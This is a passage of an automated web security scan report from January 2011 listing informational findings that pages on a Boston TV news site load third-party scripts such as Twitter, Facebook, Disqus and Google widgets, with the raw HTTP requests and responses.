Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2987
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19084
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Money Monday - Car Payments</title>
<meta name="publisher" conte
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1497. http://www1.whdh.com/features/articles/hank/BO144452/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144452/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144452/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:53 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7038
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19344
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Gas Leaks</title>
<meta name="publisher" content="New England Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1498. http://www1.whdh.com/features/articles/hank/BO144489/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144489/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144489/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:52 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2985
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:47 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18713
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Baby Monitors</title>
<meta name="publisher" content="New Englan
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1499. http://www1.whdh.com/features/articles/hank/BO144588/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144588/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144588/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:52 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7039
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20268
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Asbestos in Schools</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1500. http://www1.whdh.com/features/articles/hiller/BO144771/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144771/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144771/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7048
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16330
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Pay cut for MA lawmakers</title>
<meta name="publisher" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1501. http://www1.whdh.com/features/articles/hiller/BO144776/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144776/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144776/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=2991
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:41 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17215
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Governor Pre-Inaugural Interview</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1502. http://www1.whdh.com/features/articles/hiller/BO144796/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144796/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144796/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:37 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2979
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16472
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Hiller - Inauguration</title>
<meta name="publisher" content="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1503. http://www1.whdh.com/features/articles/hiller/BO144813/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144813/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144813/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7050
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16487
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Arizona Massacre</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1504. http://www1.whdh.com/features/articles/hiller/BO144841/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144841/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144841/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:34 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7052
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17479
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - One on One with Senator Scott Brown</title>
<meta name="publis
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1505. http://www1.whdh.com/features/articles/holiday_helping/BO144709/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144709/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7042
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15382
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Matt Lorch</title>
<meta name="publisher" content="New Eng
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1506. http://www1.whdh.com/features/articles/holiday_helping/BO144719/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144719/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2980
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Frances Rivera</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1507. http://www1.whdh.com/features/articles/holiday_helping/BO144727/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144727/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7046
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Larry Ridley</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1508. http://www1.whdh.com/features/articles/holiday_helping/BO144733/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144733/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2979
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15401
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Anne Allred</title>
<meta name="publisher" content="New En
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1509. http://www1.whdh.com/features/main/dish/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/main/dish/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /features/main/dish/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=467
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:04:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20944
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish</title>
<meta name="publisher" content="New England News Station Boston Cha
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1510. http://www1.whdh.com/features/main/hank/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/main/hank/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /features/main/hank/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2973
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23082
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates</title>
<meta name="publisher" content="New England News Station B
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1511. http://www1.whdh.com/features/main/hiller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/main/hiller/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /features/main/hiller/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7057
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
